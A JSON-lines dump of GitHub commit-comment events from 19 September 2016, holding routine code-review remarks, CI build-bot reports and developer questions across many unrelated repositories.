{"id":"4586189569","type":"CommitCommentEvent","actor":{"login":"cxj"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19086470,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-19T21:55:39Z","updated_at":"2016-09-19T21:55:39Z","body":"Found my problem.  The parser is no longer tolerant of HTML comments being embedded in an XML document.  That is, this is not allowed, though it somehow worked before:\r\n```xml\r\n<!-- some comment -->\r\n<div>\r\nblah blah\r\n</div>\r\n```"}},"created_at":"2016-09-19T21:55:39Z"}
{"id":"4586189636","type":"CommitCommentEvent","actor":{"login":"zotlabs"},"repo":{"name":"redmatrix/hubzilla"},"payload":{"comment":{"id":19086471,"position":5,"line":445,"path":"include/features.php","commit_id":"0cba82ce9c23ea4db141d2d5db3dcfcb4a4fe7dc","created_at":"2016-09-19T21:55:40Z","updated_at":"2016-09-19T21:55:40Z","body":"I ran into problems using unset in a foreach loop. It renumbers the entries and the foreach completes prematurely without looping through one or more remaining elements.  This is the reason for all this array mangling and copying.\r\n\r\nThis case *should* have been handled in the for loop just after this; where the empty arrays are unset after they've all been processed. But in retrospect and after a bit of coffee, that may have the same problem and narr isn't the array we're looping through originally; so the following for loop should probably be scrapped.  "}},"created_at":"2016-09-19T21:55:40Z"}
{"id":"4586190800","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086475,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T21:55:53Z","updated_at":"2016-09-19T21:55:53Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-19T21:55:53Z"}
{"id":"4586191181","type":"CommitCommentEvent","actor":{"login":"zotlabs"},"repo":{"name":"redmatrix/hubzilla"},"payload":{"comment":{"id":19086476,"position":8,"line":448,"path":"include/features.php","commit_id":"0cba82ce9c23ea4db141d2d5db3dcfcb4a4fe7dc","created_at":"2016-09-19T21:55:58Z","updated_at":"2016-09-19T21:55:58Z","body":"meaning this for loop"}},"created_at":"2016-09-19T21:55:58Z"}
{"id":"4586195029","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086493,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T21:56:46Z","updated_at":"2016-09-19T21:56:46Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T21:56:46Z"}
{"id":"4586199246","type":"CommitCommentEvent","actor":{"login":"smoobeon"},"repo":{"name":"smoobeon/hello-world"},"payload":{"comment":{"id":19086502,"position":null,"line":null,"path":null,"commit_id":"4cbadaa7f0fbb1a332230d272032ae03e3a4caae","created_at":"2016-09-19T21:57:40Z","updated_at":"2016-09-19T21:57:40Z","body":"good"}},"created_at":"2016-09-19T21:57:40Z"}
{"id":"4586199953","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086506,"position":20,"line":20,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T21:57:49Z","updated_at":"2016-09-19T21:57:49Z","body":"I've seen that there's a `Size` vs `Count` discussion on gitter but isn't `length` most VHDLish? That's what we use to count the number of elements in arrays."}},"created_at":"2016-09-19T21:57:49Z"}
{"id":"4586208959","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086517,"position":119,"line":119,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T21:59:43Z","updated_at":"2016-09-19T21:59:43Z","body":"В целом всё ОК, но есть парочка моментов:\r\n\r\nЗанятие по исключением будет следующим. Но всё же в такой реализации будет нарушен контракт на метод next:\r\n@throws NoSuchElementException if the iteration has no more elements\r\nЗдесь же исполнится контракт на метод get List'а:\r\n@throws IndexOutOfBoundsException if the index is out of range\r\n"}},"created_at":"2016-09-19T21:59:43Z"}
{"id":"4586209947","type":"CommitCommentEvent","actor":{"login":"eliasdaler"},"repo":{"name":"ThePhD/sol2"},"payload":{"comment":{"id":19086521,"position":null,"line":null,"path":null,"commit_id":"8c9c662d97260be214ae15e862392388c57477a9","created_at":"2016-09-19T21:59:56Z","updated_at":"2016-09-19T21:59:56Z","body":"O:"}},"created_at":"2016-09-19T21:59:56Z"}
{"id":"4586210428","type":"CommitCommentEvent","actor":{"login":"KennethMatheusve"},"repo":{"name":"KennethMatheusve/testCommand"},"payload":{"comment":{"id":19086523,"position":null,"line":null,"path":null,"commit_id":"87c365a64b4024e33dc53c3766a09b0da5fadbbf","created_at":"2016-09-19T22:00:03Z","updated_at":"2016-09-19T22:00:03Z","body":"no entiendo "}},"created_at":"2016-09-19T22:00:03Z"}
{"id":"4586213294","type":"CommitCommentEvent","actor":{"login":"luismorenovinus"},"repo":{"name":"desarrollovinus/predios"},"payload":{"comment":{"id":19086528,"position":null,"line":null,"path":null,"commit_id":"86aaf076e659be26ff43b64cd4c53a602145d7f0","created_at":"2016-09-19T22:00:35Z","updated_at":"2016-09-19T22:00:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GDIcTB5I&#x2F;37-nuevo-formularios-de-construcciones-y-construcciones-anexas\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (Nuevo) Formularios de construcciones y construcciones anexas</a>"}},"created_at":"2016-09-19T22:00:35Z"}
{"id":"4586213930","type":"CommitCommentEvent","actor":{"login":"luismorenovinus"},"repo":{"name":"desarrollovinus/predios"},"payload":{"comment":{"id":19086530,"position":null,"line":null,"path":null,"commit_id":"c6948080a72d49df2e0b4acaa72a34a2c39d52f0","created_at":"2016-09-19T22:00:43Z","updated_at":"2016-09-19T22:00:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GDIcTB5I&#x2F;37-nuevo-formularios-de-construcciones-y-construcciones-anexas\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (Nuevo) Formularios de construcciones y construcciones anexas</a>"}},"created_at":"2016-09-19T22:00:43Z"}
{"id":"4586215042","type":"CommitCommentEvent","actor":{"login":"marwarekik24"},"repo":{"name":"iskanderjaiem/Planez"},"payload":{"comment":{"id":19086533,"position":null,"line":null,"path":null,"commit_id":"7f5c1380a9fc308b367616e9809145400608dcab","created_at":"2016-09-19T22:00:57Z","updated_at":"2016-09-19T22:00:57Z","body":"you are a genius !"}},"created_at":"2016-09-19T22:00:57Z"}
{"id":"4586217088","type":"CommitCommentEvent","actor":{"login":"titusfortner"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19086537,"position":4,"line":87,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"134cbc257d9df7d02d7cbe7d5734434187927b26","created_at":"2016-09-19T22:01:20Z","updated_at":"2016-09-19T22:01:20Z","body":"No, seriously, thanks for helping to check my work. :) If you have any ideas or issues please let me know."}},"created_at":"2016-09-19T22:01:20Z"}
{"id":"4586217407","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086540,"position":17,"line":17,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:01:26Z","updated_at":"2016-09-19T22:01:26Z","body":"Yeah, the reason why the Init procedure hasn't any real implementation is, that I don't know, what to implement there. IMHO it can be removed. I agree that declaring an instance of a protected type should be enough to make it work.\r\nI'm not sure, which type of logging I would use. At work, we use plain VHDL reports to avoid too much dependencies. Logging is there for debugging purposes, like printing messages when a key/value pair is set or get."}},"created_at":"2016-09-19T22:01:26Z"}
{"id":"4586221201","type":"CommitCommentEvent","actor":{"login":"titusfortner"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19086545,"position":30,"line":98,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"6d52426596e4af61c51264227deffc5fbf9f635f","created_at":"2016-09-19T22:02:12Z","updated_at":"2016-09-19T22:02:12Z","body":"yup, that's a bad copy/paste. thanks for the catch!"}},"created_at":"2016-09-19T22:02:12Z"}
{"id":"4586224933","type":"CommitCommentEvent","actor":{"login":"peterlarson"},"repo":{"name":"peterlarson/peterlarson.github.io"},"payload":{"comment":{"id":19086552,"position":null,"line":null,"path":null,"commit_id":"3a317b316e9c64354a4c71d376ee3aa5f088bf45","created_at":"2016-09-19T22:02:59Z","updated_at":"2016-09-19T22:02:59Z","body":"A better commit message would have been \"Deleted some files\""}},"created_at":"2016-09-19T22:02:59Z"}
{"id":"4586230353","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086566,"position":20,"line":20,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:04:09Z","updated_at":"2016-09-19T22:04:09Z","body":"Length implies for me the length of a data type like a std_logic_vector. Count does better imply the number of entries in a data type IMHO. But for a dynamic array like a list, length would be more intuitive. Should we use the same method names for each data type if that's possible?  I'm not sure about that."}},"created_at":"2016-09-19T22:04:09Z"}
{"id":"4586231041","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19086569,"position":null,"line":null,"path":null,"commit_id":"2459cb5f45611bf879a57f09ecd722ec6e298ff1","created_at":"2016-09-19T22:04:17Z","updated_at":"2016-09-19T22:04:17Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-19T22:04:17Z"}
{"id":"4586232059","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19086570,"position":null,"line":null,"path":null,"commit_id":"2459cb5f45611bf879a57f09ecd722ec6e298ff1","created_at":"2016-09-19T22:04:31Z","updated_at":"2016-09-19T22:04:31Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-19T22:04:31Z"}
{"id":"4586236728","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/impersonation-plugin"},"payload":{"comment":{"id":19086583,"position":177,"line":177,"path":"src/main/java/org/jenkinsci/plugins/impersonation/ImpersonationAction.java","commit_id":"d57fdab5296497c3658a289e96547fd917a109f3","created_at":"2016-09-19T22:05:34Z","updated_at":"2016-09-19T22:05:34Z","body":"So what exactly is the purpose of this? So long as `User.get(String)` does not produce something useful from this string, what can you actually do with your new authentication, other than doing less until you log out? Missing the higher-level use case here."}},"created_at":"2016-09-19T22:05:34Z"}
{"id":"4586236982","type":"CommitCommentEvent","actor":{"login":"sagaradapala"},"repo":{"name":"rundeck/anvils-demo"},"payload":{"comment":{"id":19086586,"position":1,"line":1,"path":"aclpolicy/ops-jobs-allow-anvils.aclpolicy","commit_id":"78d57ef7fec64b5005fc858242fb1bfb441ef692","created_at":"2016-09-19T22:05:37Z","updated_at":"2016-09-19T22:05:37Z","body":"Hi ahonor,\r\n\r\nI'm new to run deck code, i tried to create job access to new user using the code above. \r\n\r\n---\r\ndescription:'generated'\r\ncontext:\r\n  project: 'vqs_report'\r\nfor:\r\n  resource:\r\n  - allow: [read]\r\n  job:\r\n  - equals:\r\n      group: 'vqs_chn_dp'\r\n       name: 'vas_china_raw_sample_load'\r\n      allow: [update,kill,read,run]\r\nby:\r\n  group: dev\r\n\r\n--- it is not working and i tried giving job access using rd-acl create successfully and rd-acl test was passed as well\r\nbut in GUI, i am unable to see the jobs.\r\n\r\nCan you please suggest me that is the issue and how to fix it.\r\n\r\nThanks,\r\nSagar"}},"created_at":"2016-09-19T22:05:37Z"}
{"id":"4586240508","type":"CommitCommentEvent","actor":{"login":"nataliac06"},"repo":{"name":"ua-eas/kfs"},"payload":{"comment":{"id":19086593,"position":null,"line":null,"path":null,"commit_id":"9123bb592ecb48c6c23e8eeae46ca0dd228728fd","created_at":"2016-09-19T22:06:25Z","updated_at":"2016-09-19T22:06:25Z","body":"I've removed the liquibase changes from this pull request as they have to be handled in the db-upgrade scripts that also migrate the data in the new columns from KFS 3.0"}},"created_at":"2016-09-19T22:06:25Z"}
{"id":"4586241098","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086597,"position":104,"line":104,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T22:06:33Z","updated_at":"2016-09-19T22:06:33Z","body":"С двумя раздельными индексами возникает проблема:\r\nделаю  next() (результат = 1 элемент) -> next() (результат = 2 элемент), а потом делаю previous() в надежде получить снова 1-й, но получаю последний элемент."}},"created_at":"2016-09-19T22:06:33Z"}
{"id":"4586245719","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19086606,"position":5,"line":78,"path":"azure-mgmt-redis/src/main/java/com/microsoft/azure/management/redis/RedisCache.java","commit_id":"24c5a7c2c4105941eb9e39a9cf0b1f8c3a13485b","created_at":"2016-09-19T22:07:18Z","updated_at":"2016-09-19T22:07:18Z","body":"misspelling: 'id' -> 'if'"}},"created_at":"2016-09-19T22:07:18Z"}
{"id":"4586245886","type":"CommitCommentEvent","actor":{"login":"hishamhm"},"repo":{"name":"hishamhm/htop"},"payload":{"comment":{"id":19086607,"position":null,"line":null,"path":null,"commit_id":"5df425867cd992ccadbe8b5cf713404fd53db7df","created_at":"2016-09-19T22:07:20Z","updated_at":"2016-09-19T22:07:20Z","body":"> I'm not sure if this is intentional or not.\r\n\r\nYes, it was."}},"created_at":"2016-09-19T22:07:20Z"}
{"id":"4586247937","type":"CommitCommentEvent","actor":{"login":"tgvaughan"},"repo":{"name":"CompEvol/beast2"},"payload":{"comment":{"id":19086611,"position":null,"line":null,"path":null,"commit_id":"bbbf4335ad4515bec119ae3a35b25049d34ae596","created_at":"2016-09-19T22:07:48Z","updated_at":"2016-09-19T22:07:48Z","body":"You don't think we could use this elsewhere?"}},"created_at":"2016-09-19T22:07:48Z"}
{"id":"4586249944","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19086616,"position":null,"line":null,"path":null,"commit_id":"c11f910926793f77a353964c1383a04d558b87fa","created_at":"2016-09-19T22:08:15Z","updated_at":"2016-09-19T22:08:15Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=75)"}},"created_at":"2016-09-19T22:08:15Z"}
{"id":"4586253148","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":19086624,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-19T22:08:57Z","updated_at":"2016-09-19T22:08:57Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.271.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76935&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:20"}},"created_at":"2016-09-19T22:08:57Z"}
{"id":"4586254269","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086625,"position":92,"line":92,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T22:09:13Z","updated_at":"2016-09-19T22:09:13Z","body":"Здесь можно было использовать информацию о длине строки (+ дополнительно придётся сделать предположение о кодировке файла). Тогда можно предположить число строк в файле и использовать эту информацию при работе с ArrayList'ом."}},"created_at":"2016-09-19T22:09:13Z"}
{"id":"4586257263","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19086634,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-19T22:09:55Z","updated_at":"2016-09-19T22:09:55Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-12: Tests Failed (1764 of 2337 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.48%25-red.svg)</a> \n"}},"created_at":"2016-09-19T22:09:55Z"}
{"id":"4586258044","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19086636,"position":null,"line":null,"path":null,"commit_id":"925502756e3da15d6e28ffa57053f45777ec373a","created_at":"2016-09-19T22:10:07Z","updated_at":"2016-09-19T22:10:07Z","body":"![screenshot001](https://cloud.githubusercontent.com/assets/6500800/18650663/20fe730e-7e7b-11e6-8d94-569c7b36a36f.jpg)\r\n"}},"created_at":"2016-09-19T22:10:07Z"}
{"id":"4586258927","type":"CommitCommentEvent","actor":{"login":"DanielJoyce"},"repo":{"name":"vert-x3/vertx-lang-js"},"payload":{"comment":{"id":19086638,"position":null,"line":null,"path":null,"commit_id":"6f07587ebb652faff88a66ff11a8c8e59080b6c0","created_at":"2016-09-19T22:10:18Z","updated_at":"2016-09-19T22:10:18Z","body":"Ehh, I may be wrong it looks like. But it is so frustrating the eco system is so messy."}},"created_at":"2016-09-19T22:10:18Z"}
{"id":"4586258947","type":"CommitCommentEvent","actor":{"login":"AndyScherzinger"},"repo":{"name":"nextcloud/android"},"payload":{"comment":{"id":19086640,"position":null,"line":null,"path":null,"commit_id":"eb0612809c40d89c37c661e0de2ca88cbaf0e5c7","created_at":"2016-09-19T22:10:18Z","updated_at":"2016-09-19T22:10:18Z","body":"Shouldn't it still be \"Set up calendar &amp; contacts sync\" because no matter what you do clicking on this settings item will never trigger a sync but always show a DAVdroid account setup screen?"}},"created_at":"2016-09-19T22:10:18Z"}
{"id":"4586260744","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19086642,"position":null,"line":null,"path":null,"commit_id":"22d6e31fc6a9de2ee424984e629ccd2e394ba512","created_at":"2016-09-19T22:10:43Z","updated_at":"2016-09-19T22:10:43Z","body":"Thanks for the report! I guess that's good enough for now, though fixing the security problem isn't hard."}},"created_at":"2016-09-19T22:10:43Z"}
{"id":"4586264550","type":"CommitCommentEvent","actor":{"login":"StefanIlliev"},"repo":{"name":"StefanIlliev/test-repo"},"payload":{"comment":{"id":19086646,"position":null,"line":null,"path":null,"commit_id":"fc0f1eb0acb7e35023367b925bb537584bf7b65d","created_at":"2016-09-19T22:11:38Z","updated_at":"2016-09-19T22:11:38Z","body":"We try to merge some"}},"created_at":"2016-09-19T22:11:38Z"}
{"id":"4586267993","type":"CommitCommentEvent","actor":{"login":"mdsmith"},"repo":{"name":"PacificBiosciences/pbcore"},"payload":{"comment":{"id":19086649,"position":null,"line":null,"path":null,"commit_id":"2b2782e68a0117e0844279a001a010376e18b644","created_at":"2016-09-19T22:12:23Z","updated_at":"2016-09-19T22:12:23Z","body":"Yep, can probably be resolved in the next XSD sync by updating the cached pyxb files using the newer pyxb version."}},"created_at":"2016-09-19T22:12:23Z"}
{"id":"4586269453","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19086651,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T22:12:44Z","updated_at":"2016-09-19T22:12:44Z","body":"Found the issue. Soome files has a wrog context, but i still do not understand why\r\n                                                                                                                                                                          \r\nSELinux:  Relabeling /system/bin/qmuxd from u:object_r:system_file:s0 to u:object_r:qmuxd_exec:s0.                                                                                                                                           \r\nSELinux:  Relabeling /system/bin/qcks from u:object_r:system_file:s0 to u:object_r:mdm_helper_exec:s0.                                                                                                                                       \r\nSELinux:  Relabeling /system/bin/ks from u:object_r:system_file:s0 to u:object_r:mdm_helper_exec:s0.\r\nSELinux:  Relabeling /system/bin/netmgrd from u:object_r:system_file:s0 to u:object_r:netmgrd_exec:s0.\r\n\r\nThese are the GSM binary with wrong context, change it and after a reboot baseband works\r\n"}},"created_at":"2016-09-19T22:12:44Z"}
{"id":"4586270378","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19086654,"position":27,"line":27,"path":"src/ru/sberbank/school/Task3.java","commit_id":"5405ffc32b633394def0324ccfa7a7d4a88e3917","created_at":"2016-09-19T22:12:57Z","updated_at":"2016-09-19T22:12:57Z","body":"Лучше сначала использовать модификатор доступа, а потом final"}},"created_at":"2016-09-19T22:12:57Z"}
{"id":"4586276723","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086667,"position":17,"line":17,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:14:24Z","updated_at":"2016-09-19T22:14:24Z","body":"I think debugging of the users application should be done by that application. Any set/get logs are also anonymous unless there is a way to name the object of the PT type. I think we better leave this to the application. You don't find these type of logs in the built-in data types. I would consider asserts for key errors and similar though."}},"created_at":"2016-09-19T22:14:24Z"}
{"id":"4586277726","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19086669,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T22:14:37Z","updated_at":"2016-09-19T22:14:37Z","body":"that would mean ramdisk and device's tree rootdir is not same or something ?"}},"created_at":"2016-09-19T22:14:37Z"}
{"id":"4586278376","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19086671,"position":52,"line":58,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-19T22:14:45Z","updated_at":"2016-09-19T22:14:45Z","body":"I mean, current solution is not very convenient, but whether to change it or not depends on how to change it."}},"created_at":"2016-09-19T22:14:45Z"}
{"id":"4586279382","type":"CommitCommentEvent","actor":{"login":"grahamu"},"repo":{"name":"pinax/pinax-api"},"payload":{"comment":{"id":19086674,"position":null,"line":null,"path":null,"commit_id":"8f2e1ef30a62c19fc91eed48adc38ecfcdbc37d6","created_at":"2016-09-19T22:15:00Z","updated_at":"2016-09-19T22:15:00Z","body":"Similar issue when using Resource.from_queryset() method on a list of dictionaries: `AttributeError: 'list' object has no attribute '_clone'`."}},"created_at":"2016-09-19T22:15:00Z"}
{"id":"4586279854","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"dg/dibi"},"payload":{"comment":{"id":19086676,"position":533,"line":533,"path":"dibi/drivers/firebird.php","commit_id":"5e3bc8d0e91a01fe32d0ff2c824520f6e956c545","created_at":"2016-09-19T22:15:08Z","updated_at":"2016-09-19T22:15:08Z","body":"Could you send PR?"}},"created_at":"2016-09-19T22:15:08Z"}
{"id":"4586281776","type":"CommitCommentEvent","actor":{"login":"kean"},"repo":{"name":"hyperoslo/Cache"},"payload":{"comment":{"id":19086682,"position":1,"line":1,"path":".travis.yml","commit_id":"430b24a8bd98defd4174f9e24d53cbe0b285c936","created_at":"2016-09-19T22:15:32Z","updated_at":"2016-09-19T22:15:32Z","body":"Hey guys! Is there an estimate for when you are going to release Swift 3 compatible version? I'm currently looking for a caching library (preferably written in Swift) to integrate in [Nuke](https://github.com/kean/Nuke). Cache seems like a good fit."}},"created_at":"2016-09-19T22:15:32Z"}
{"id":"4586282047","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19086683,"position":90,"line":90,"path":"src/ru/sberbank/school/Task3.java","commit_id":"5405ffc32b633394def0324ccfa7a7d4a88e3917","created_at":"2016-09-19T22:15:35Z","updated_at":"2016-09-19T22:15:35Z","body":"Несколько не совсем то, что ожидалось - предполагалось, что на каждое задание необходимо будет использовать конкретную коллекцию, которая больше всего для него подходит. Т.е. универсальность была не нужна. Например, здесь больше всего подходит HashSet"}},"created_at":"2016-09-19T22:15:35Z"}
{"id":"4586283569","type":"CommitCommentEvent","actor":{"login":"cplaverty"},"repo":{"name":"cplaverty/KeitaiWaniKani"},"payload":{"comment":{"id":19086689,"position":null,"line":null,"path":null,"commit_id":"7264e9034c2d001a49181b58e39f7f2956ccbec2","created_at":"2016-09-19T22:15:57Z","updated_at":"2016-09-19T22:15:57Z","body":"Partial fix for #6 "}},"created_at":"2016-09-19T22:15:57Z"}
{"id":"4586286204","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19086695,"position":94,"line":98,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-19T22:16:33Z","updated_at":"2016-09-19T22:16:33Z","body":"s/an/a"}},"created_at":"2016-09-19T22:16:33Z"}
{"id":"4586286696","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19086697,"position":103,"line":103,"path":"src/ru/sberbank/school/Task3.java","commit_id":"5405ffc32b633394def0324ccfa7a7d4a88e3917","created_at":"2016-09-19T22:16:40Z","updated_at":"2016-09-19T22:16:40Z","body":"Попробуйте также ArrayDeque с descendingIterator"}},"created_at":"2016-09-19T22:16:40Z"}
{"id":"4586288724","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086707,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T22:17:08Z","updated_at":"2016-09-19T22:17:08Z","body":"array<> in headerpacket is ambiguous, meaning the compiler is getting confused, mistaking array with std::array (which is not managed), with ref array"}},"created_at":"2016-09-19T22:17:08Z"}
{"id":"4586289060","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19086708,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T22:17:12Z","updated_at":"2016-09-19T22:17:12Z","body":"Additionally, this behavior has nothing to do with __add__ specifically, and if it's not __add__, mypy accepts the unsafe code."}},"created_at":"2016-09-19T22:17:12Z"}
